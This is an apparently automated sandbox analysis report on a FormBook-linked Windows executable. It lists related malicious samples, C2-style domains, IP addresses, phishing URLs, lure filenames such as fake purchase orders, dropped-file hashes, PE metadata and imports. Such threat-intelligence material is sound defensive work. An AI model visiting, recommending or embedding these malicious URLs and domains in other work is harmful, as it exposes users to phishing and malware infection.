• Number of executed functions: 51
• Number of non-executed functions: 293
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:09:23 | API Interceptor | 8070406x Sleep call for process: RMActivate_ssp.exe modified
Joe Sandbox View / Context (Match | Associated Sample Name / URL | Detection | Threat Name | Context)

IPs:

45.33.6.223
    PO#86637.exe | malicious | FormBook | www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
    PO #86637.exe | malicious | FormBook | www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
    Paul Meeting Proposal and Schedule.xls | malicious | FormBook | www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
    Paul Agrotis List.xls | malicious | FormBook | www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip
    SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsx | malicious | FormBook | www.sqlite.org/2018/sqlite-dll-win32-x86-3260000.zip
    350.xls | malicious | FormBook | www.sqlite.org/2020/sqlite-dll-win32-x86-3320000.zip
    SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtf | malicious | FormBook | www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zip
    Mac Purchase Order PO102935.xls | malicious | FormBook | www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
    SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsx | malicious | FormBook | www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
    AWB# 6290868304.docx.doc | malicious | FormBook | www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
47.57.185.227
    AIDHL3290435890.exe | malicious | FormBook | www.726075.buzz/w9nd/
    PO#4510065525.exe | malicious | FormBook | www.726075.buzz/w9nd/
85.159.66.93
    PDF PURCHASE INQUIRY PDF.exe | malicious | FormBook | www.araste.xyz/m0z5/
    PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | www.golbasi-nakliyat.xyz/k2vl/
    MV ALIADO-S-REQ-19-000640.exe | malicious | FormBook | www.araste.xyz/m0z5/
    Doc_PO6900000827.exe | malicious | FormBook | www.golbasi-nakliyat.xyz/k2vl/
    New Purchase Order.exe | malicious | FormBook | www.nevsehir-nakliyat.xyz/csz1/?lt=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&3ry=nj20Xr
    Scan 00093847.exe | malicious | FormBook | www.nevsehir-nakliyat.xyz/csz1/
    PO_20240906011824.exe | malicious | FormBook | www.golbasi-nakliyat.xyz/k2vl/
    RBNB5FNsEZ.exe | malicious | FormBook | www.haberida.xyz/b6fq/?GjDp=wrVwjKBbBkrKkWEDyE6tEQmgUZ4JwdbPk7V1qTuOqFOWCUVr+b2/049XRLV2YGdGqQFF3qMQnC5pi/cfHpaBTuijMF4pcJrkXHnMIsLi8m6d5AXpeYFzM5o=&bN7xP=uTAt3vp8TJJx5z
    PO #86637.exe | malicious | FormBook | www.sailnway.net/lrst/
    RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exe | malicious | FormBook | www.nevsehir-nakliyat.xyz/34gz/

Domains:

www.kckartal.xyz
    PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 104.21.20.125
    Doc_PO6900000827.exe | malicious | FormBook | 172.67.192.227
    PO_20240906011824.exe | malicious | FormBook | 172.67.192.227
    AIDHL3290435890.exe | malicious | FormBook | 104.21.20.125
    PO#4510065525.exe | malicious | FormBook | 104.21.20.125
www.mizuquan.top
    PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 43.242.202.169
    Doc_PO6900000827.exe | malicious | FormBook | 43.242.202.169
    PO_20240906011824.exe | malicious | FormBook | 43.242.202.169
    PO #86637.exe | malicious | FormBook | 43.242.202.169
    COTIZACION 290824.exe | malicious | FormBook | 43.242.202.169
    PO#4510065525.exe | malicious | FormBook | 43.242.202.169
www.quilo.life
    PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 203.161.43.228
    Doc_PO6900000827.exe | malicious | FormBook | 203.161.43.228
    PO_20240906011824.exe | malicious | FormBook | 203.161.43.228
    AIDHL3290435890.exe | malicious | FormBook | 203.161.43.228
    PO#4510065525.exe | malicious | FormBook | 203.161.43.228

ASNs:

VNPT-AS-VNVNPTCorpVN
    PDF PURCHASE INQUIRY PDF.exe | malicious | FormBook | 203.161.42.73
    PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 203.161.43.228
    Jsn496Em5T.exe | malicious | FormBook | 203.161.43.228
    MV ALIADO-S-REQ-19-000640.exe | malicious | FormBook | 203.161.42.73
    Doc_PO6900000827.exe | malicious | FormBook | 203.161.43.228
    PO_20240906011824.exe | malicious | FormBook | 203.161.43.228
    doc330391202408011.exe | malicious | FormBook | 203.161.42.73
    yyyyyyyy.exe | malicious | FormBook | 203.161.42.73
    1V8XAuKZqe.exe | malicious | FormBook | 203.161.42.161
    6i4QCFbsNi.exe | malicious | FormBook | 203.161.43.228
CIZGITR
    PDF PURCHASE INQUIRY PDF.exe | malicious | FormBook | 85.159.66.93
    PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 85.159.66.93
    MV ALIADO-S-REQ-19-000640.exe | malicious | FormBook | 85.159.66.93
    Doc_PO6900000827.exe | malicious | FormBook | 85.159.66.93
                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                      • 85.159.66.93
                      Scan 00093847.exeGet hashmaliciousFormBookBrowse
                      • 85.159.66.93
                      PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                      • 85.159.66.93
                      RBNB5FNsEZ.exeGet hashmaliciousFormBookBrowse
                      • 85.159.66.93
                      PO #86637.exeGet hashmaliciousFormBookBrowse
                      • 85.159.66.93
                      RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
                      • 85.159.66.93
                      CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttp://xlchome.com/Get hashmaliciousUnknownBrowse
                      • 8.209.255.96
                      http://is.gd/af4MWe?US=937448/Get hashmaliciousUnknownBrowse
                      • 47.245.132.166
                      http://login-wsapp-hk.top/Get hashmaliciousUnknownBrowse
                      • 8.210.39.246
                      https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com////amp/s/jbmagneticos.com.br/.dev/VGCU2YC1/c211bGxpbmdzQHRtaGNjLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                      • 47.246.146.53
                      https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bva%C2%ADnd%C2%ADat%C2%ADco%E2%80%8B.%C2%ADv%C2%ADn/.dev/ChZuQF9L/bHlubi5wYXJzb25zQGltYWdvLmNvbW11bml0eQ===$%E3%80%82Get hashmaliciousHTMLPhisherBrowse
                      • 47.246.131.135
                      PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                      • 47.57.185.227
                      PROPOSTA CONTRATTUALE.msgGet hashmaliciousHTMLPhisherBrowse
                      • 47.246.131.28
                      Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                      • 47.57.185.227
                      5Mjl7L7bW2.exeGet hashmaliciousUnknownBrowse
                      • 47.88.148.135
                      5Mjl7L7bW2.exeGet hashmaliciousUnknownBrowse
                      • 47.88.148.135
                      LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGPO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                      • 103.150.11.230
                      5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                      • 103.150.11.230
                      uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                      • 103.150.11.230
                      PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      doc330391202408011.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      PO #86637.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                      • 172.96.191.39
                      LINODE-APLinodeLLCUS5h48M0mr7p.exeGet hashmaliciousFormBookBrowse
                      • 96.126.123.244
                      file.vbsGet hashmaliciousUnknownBrowse
                      • 50.116.27.201
                      2176.exeGet hashmaliciousUnknownBrowse
                      • 69.164.210.167
                      2176.exeGet hashmaliciousUnknownBrowse
                      • 23.239.21.63
                      https://app.scalenut.com/creator/d0ab8cf4-bc58-4dd4-a63c-fdc95e54322f/kj8jd9r9doGet hashmaliciousHTMLPhisherBrowse
                      • 172.105.69.135
                      https://ledgerapp.in/vendors/acupdated/ac.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 172.105.14.134
                      https://parking3.parklogic.com/page/scribe.php?pcId=12&domain=meetrachelcook.com&pId=130&usid=27&utid=7979539826&query=null&domainJs=ww12.meetrachelcook.com&path=/&ss=true&lp=1Get hashmaliciousUnknownBrowse
                      • 45.79.244.209
                      https://hoo.be/rachelcookGet hashmaliciousUnknownBrowse
                      • 45.79.244.209
                      EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                      • 45.56.79.23
                      PROFORMA INVOICE BKS-0121-24-25-JP240604.exeGet hashmaliciousFormBookBrowse
                      • 96.126.123.244
                      No context
                                        Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):449193
                                        Entropy (8bit):7.998501123969788
                                        Encrypted:true
                                        SSDEEP:6144:jXoz9So1ux9eAuKRsdDe3ORuIlYrKwVyVLndNNXe24i8vCVrlWswlaWpgoeOmg1x:0/1ubzuEkRuIerXpCVrlVEHbLv
                                        MD5:9EC4D0FE38CB4DE94D578BFD72C8EEBD
                                        SHA1:E316282A617C5F0C40C488DE79C73CF13C8BAAF2
                                        SHA-256:2402C65692D0A822D7931489D1BBF29FA9BFBF210819C1614DD8D2350E747F2F
                                        SHA-512:A3D1FF3C516CF2C6548E03D68EEAFF530ACC794E1F76253D46B092183BD762C1126160DD611E0D3CEEC5D0664D946E5D154B8DC88B1BCCF606B57CFD59A31201
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                        Category:dropped
                                        Size (bytes):77824
                                        Entropy (8bit):1.133993246026424
                                        Encrypted:false
                                        SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                        MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                        SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                        SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                        SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Process:C:\Users\user\Desktop\Payment confirmation 20240911.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):288768
                                        Entropy (8bit):7.993862746080312
                                        Encrypted:true
                                        SSDEEP:6144:dDwh81eZWKAucoKw5xEw0Yh8xDkP90E2MzgAGy:dchFBAjoKwD0YhoDkP/Dso
                                        MD5:2DB554BF84EE0751D2503BEC8EEED7B3
                                        SHA1:027619A76D49CE5F7E9D83CC181EAD8BC30CBDBC
                                        SHA-256:7B26E47F37165F960068526A4E2DCC2C49C6942E969BE4FE4D2E5700A8F8C65B
                                        SHA-512:572AB89F1961DD2716FD8AB83C6D5775860FBD3EF16ECB70A979D260E4DA2F7E6E37857BB4B3F663B83B4504B82397206F23BE5AD1FBE2010854C03EB2791468
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):5167
                                        Entropy (8bit):4.34771473123006
                                        Encrypted:false
                                        SSDEEP:96:GcuN/gR+7Oc0XRMcCM3KOGOF++BlMtvrENw+Y0ac:E/Q+7Oc0JKOBF++EvrENw+cc
                                        MD5:CD9B704B328573406D319F6E22E043BE
                                        SHA1:FB88536357CF2A7DB522684887AFFD85AB5747DA
                                        SHA-256:8274A340B59D469C27EB238A7984D250287C7820556A9E2693E8F1ECD907936A
                                        SHA-512:869AC4A65380EC36254DE7309D84D5C98D4B280E71BDCC389F4689BC140EF86EA0EB3E736CB7E906417E40EBA79C33DD712CF67099AE26FFEECFF78130E2CA29
                                        Malicious:false
                                        Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):858084
                                        Entropy (8bit):6.509766799598966
                                        Encrypted:false
                                        SSDEEP:24576:ATtmtnhKqK75YJ4+X8NLXBIXcgVMU//GV:Ashc84y8NLXBUjQ
                                        MD5:E1B58E0AA1B377A1D0E940660AD1ACE1
                                        SHA1:5AFC7291B26855B1252B26381EBC85ED3CCA218F
                                        SHA-256:1B98C006231D38524E2278A474C49274FE42E0BB1A31BCFDA02E6E32F559B777
                                        SHA-512:9CE778BCB586638662B090910C4CEAB3B64E16DFAF905A7581C1D349FECDF186995B3CC0DC8C6FC6E9761EA2831D7B14AC1619C2BD5EBC6D18015842E5D94AA2
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
• Filename: MDE_File_Sample_057ab3b6c65fb3b21b39c980be830b1c0670eb86.zip, Detection: malicious
• Filename: ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exe, Detection: malicious
• Filename: TT swift copy.xls, Detection: malicious
• Filename: AAC2FF3E-3614-4614-ADAD-F2688E62FB4.doc, Detection: malicious
• Filename: 009c487a.exe, Detection: malicious
• Filename: f1.f1.f1.doc, Detection: malicious
• Filename: 0167.doc.scr, Detection: malicious
• Filename: SWIFT-EUR 38650_06122022.xls, Detection: malicious
• Filename: PEK-AE-2210002.xls, Detection: malicious
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.147381943730137
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:Payment confirmation 20240911.exe
                                        File size:1'211'392 bytes
                                        MD5:fce0847be56787ed350b9aa76990d91d
                                        SHA1:5c3d8ca6e50e763b87244d7b9e84eab52ad6464f
                                        SHA256:f5be3462bef54d4bd79a337ab058dd1663c0a3d23a27f1c7573dde13893c8db2
                                        SHA512:54a8e3b03bb72dadce15d00b0236bd1f707e943acd9729f0b070ecf16a3f61441ab425ab37e4c9b6ce11a12d7162cb0b6132dbd68865d9076ce85a4d471ac64a
                                        SSDEEP:24576:34lavt0LkLL9IMixoEgeaWOAaqiO1pD6gUAJJNzq9MmCS:Skwkn9IMHeaWJH1h5PxaPCS
                                        TLSH:FA45DF0373DE83A5C3725233BA65BB01AEBB7C2509A1F59B2FD5093DF920162521E673
                                        Icon Hash:aaf3e3e3938382a0
                                        Entrypoint:0x426bf7
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66E0D9A3 [Tue Sep 10 23:43:31 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:bbac62fd99326ea68ec5a33b36925dd1
                                        Instruction
                                        call 00007F4348DA2A5Ch
                                        jmp 00007F4348D95944h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F4348D95ACAh
                                        cmp edi, eax
                                        jc 00007F4348D95E2Eh
                                        bt dword ptr [004C0158h], 01h
                                        jnc 00007F4348D95AC9h
                                        rep movsb
                                        jmp 00007F4348D95DDCh
                                        cmp ecx, 00000080h
                                        jc 00007F4348D95C94h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007F4348D95AD0h
                                        bt dword ptr [004BA370h], 01h
                                        jc 00007F4348D95FA0h
                                        bt dword ptr [004C0158h], 00000000h
                                        jnc 00007F4348D95C6Dh
                                        test edi, 00000003h
                                        jne 00007F4348D95C7Eh
                                        test esi, 00000003h
                                        jne 00007F4348D95C5Dh
                                        bt edi, 02h
                                        jnc 00007F4348D95ACFh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007F4348D95AD3h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007F4348D95B25h
                                        Programming Language:
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2012 UPD4 build 61030
                                        • [RES] VS2012 UPD4 build 61030
                                        • [LNK] VS2012 UPD4 build 61030
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb6b6c          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc4000          0x5e670       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x123000         0x6c20        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x8d8d0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xb2770          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8d000          0x858         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8be74 | 0x8c000 | 74af66fa540568c59b3868e78900e476 | False | 0.5690970284598215 | data | 6.681489717174931 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2c76a | 0x2c800 | 576c856afaad699ad9fe099fc6a9ce33 | False | 0.33122476299157305 | zlib compressed data | 5.781163507108141 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9f34 | 0x6200 | e6d2e204147f7cdc3055011093632f54 | False | 0.1639030612244898 | data | 2.004392861291539 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5e670 | 0x5e800 | 530de5e799b589e39ec78e3fe84adf13 | False | 0.930165447255291 | data | 7.900329964453995 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x123000 | 0xa462 | 0xa600 | c2f6ddaeef894b7510c3be928eeae5dd | False | 0.5080948795180723 | data | 5.238496692777452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x55975 | data | | | 1.0003308793117711
RT_GROUP_ICON | 0x122130 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1221a8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1221bc | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1221d0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1221e4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1222c0 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
